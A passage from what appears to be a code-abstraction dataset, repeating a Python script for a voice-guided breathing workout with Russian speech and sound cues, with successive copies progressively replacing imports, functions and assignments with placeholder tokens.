time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\nworkout = Workout(rounds, breaths, hold)\nworkout.breathe()\nworkout.statistics()\n", "<import token>\nwarnings.filterwarnings('ignore')\n<docstring token>\nrounds, breaths, hold = 4, 30, 13\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\nworkout = Workout(rounds, breaths, hold)\nworkout.breathe()\nworkout.statistics()\n", "<import token>\nwarnings.filterwarnings('ignore')\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\nworkout.breathe()\nworkout.statistics()\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\n<function token>\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment 